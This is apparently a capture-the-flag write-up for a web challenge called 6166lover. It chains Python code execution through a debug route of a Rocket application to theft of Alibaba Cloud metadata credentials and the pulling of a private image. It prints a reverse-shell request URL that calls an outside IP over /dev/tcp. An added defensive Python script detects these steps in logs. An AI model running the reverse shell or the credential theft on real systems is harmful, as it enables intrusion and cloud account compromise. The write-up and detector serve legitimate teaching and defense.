WEB-6166lover:

1. Figure out that it is a Rocket application and that its Cargo.toml has leaked.
2. Download it, find the application name "static-files", and download the binary.
3. Run it in debug mode, or write an example application yourself, to find out which routes have been registered.
4. Figure out what both of the debug routes do: one is a JS sandbox, the other is a Python "sandbox". Just treat them as black boxes and test them.
5. Run Python code to get RCE.
6. ps -ef: you will find that /flag was deleted when the instance booted.
7. Use the Alibaba Cloud metadata service to get the host instance metadata, and a worker role on it. https://help.aliyun.com/document_detail/214777.html / /meta-data/ram/security-credentials/
8. Use the metadata API to get the temporary credentials.
9. Use the temporary credentials to invoke the API GetAuthorizationToken. https://help.aliyun.com/document_detail/72334.html
10. Pull the image from the Alibaba Cloud image registry with username cr_temp_user and the authorizationToken as its password. Image: registry.cn-hangzhou.aliyuncs.com/glzjin/6166lover
    You may know these from the challenge domain: I have deployed it in the Hangzhou region of Alibaba Cloud's Kubernetes service (ACK), the author name is glzjin, and the challenge name is 6166lover.
11. After pulling it, just run it with docker run -it registry.cn-hangzhou.aliyuncs.com/glzjin/6166lover bash, and you may get the flag in the image.

Thank you :)
Just get your reverse shell like this: http://6166lover.cf8a086c34bdb47138be0b5d5b15b067a.cn-hangzhou.alicontainer.com:81/debug/wnihwi2h2i2j1no1_path_wj2mm?code=__import__('os').system('bash -c "bash -i >%26 /dev/tcp/126.96.36.199/2233 0>%261"')
And you may have to find a way to fork your process so that it does not jam this application, because it's deployed on k8s with a health check.
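From the defender's side, the two steps of this chain that leave a clear trace are the request to the debug route with a code parameter (step 5) and the pod reading /meta-data/ram/security-credentials/ from the instance metadata service (steps 7 and 8). The script below is an added example written for this writeup, not part of the challenge or the author's deployment: it scans constructed ingress access log lines and constructed pod egress records and reports both. The log formats, the pod name, the hostnames, and the route name /debug/example_path are assumptions; the ECS metadata endpoint address 100.100.100.200 is not taken from the writeup either.

```python
"""Flag two steps of the 6166lover chain in constructed logs (added example):
  (1) a request to a /debug/ route whose `code` query parameter carries
      Python that reaches __import__ / os.system / subprocess / eval / exec;
  (2) a pod-side HTTP request to the RAM credential path of the instance
      metadata service, /meta-data/ram/security-credentials/ (step 7-8).
Log formats, pod names and hostnames are assumptions, not the challenge's.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed ingress access log in common log format (assumed format).
INGRESS_LOG = """\
10.0.0.5 - - [12/Oct/2021:10:01:02 +0000] "GET /static/app.js HTTP/1.1" 200 1532
10.0.0.7 - - [12/Oct/2021:10:01:09 +0000] "GET /debug/example_path?code=1%2B1 HTTP/1.1" 200 5
10.0.0.9 - - [12/Oct/2021:10:02:31 +0000] "GET /debug/example_path?code=__import__('os').system('id') HTTP/1.1" 200 0
"""

# Constructed egress records from a pod network sensor: "<pod> <method> <url>" (assumed format).
# 100.100.100.200 is the ECS instance metadata endpoint (assumed here, not from the writeup).
EGRESS_LOG = """\
app-pod-1 GET http://registry.example.invalid/v2/
app-pod-1 GET http://100.100.100.200/latest/meta-data/ram/security-credentials/
app-pod-1 GET http://100.100.100.200/latest/meta-data/ram/security-credentials/WorkerRoleExample
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Python constructs that turn a "sandbox" eval into command execution.
DANGEROUS = re.compile(r"__import__|\bos\.system\b|\bsubprocess\b|\beval\(|\bexec\(")
METADATA_CRED_PATH = "/meta-data/ram/security-credentials/"


def find_debug_code_exec(log_text):
    """Return (client_ip, path, code) for debug-route requests whose code
    parameter contains a dangerous Python construct."""
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith("/debug/"):
            continue
        # parse_qs percent-decodes once; decode again to catch double encoding.
        code = unquote(parse_qs(parts.query).get("code", [""])[0])
        if DANGEROUS.search(code):
            hits.append((m.group("ip"), parts.path, code))
    return hits


def find_metadata_credential_reads(log_text):
    """Return (pod, path) for every egress request that touches the RAM
    security-credentials path of the metadata service."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        pod, _method, url = fields
        path = urlsplit(url).path
        if METADATA_CRED_PATH in path:
            hits.append((pod, path))
    return hits


if __name__ == "__main__":
    for ip, path, code in find_debug_code_exec(INGRESS_LOG):
        print(f"code execution via debug route: {ip} {path} code={code!r}")
    for pod, path in find_metadata_credential_reads(EGRESS_LOG):
        print(f"metadata credential read: {pod} {path}")
```

A hit from the first function means the debug route is reachable and being used as an interpreter; a hit from the second means a workload is reading the node's RAM role credentials, which is exactly what lets step 9 and 10 pull private registry images. The durable fix is to keep debug routes out of production builds and to deny pods network access to the metadata endpoint unless the workload genuinely needs it.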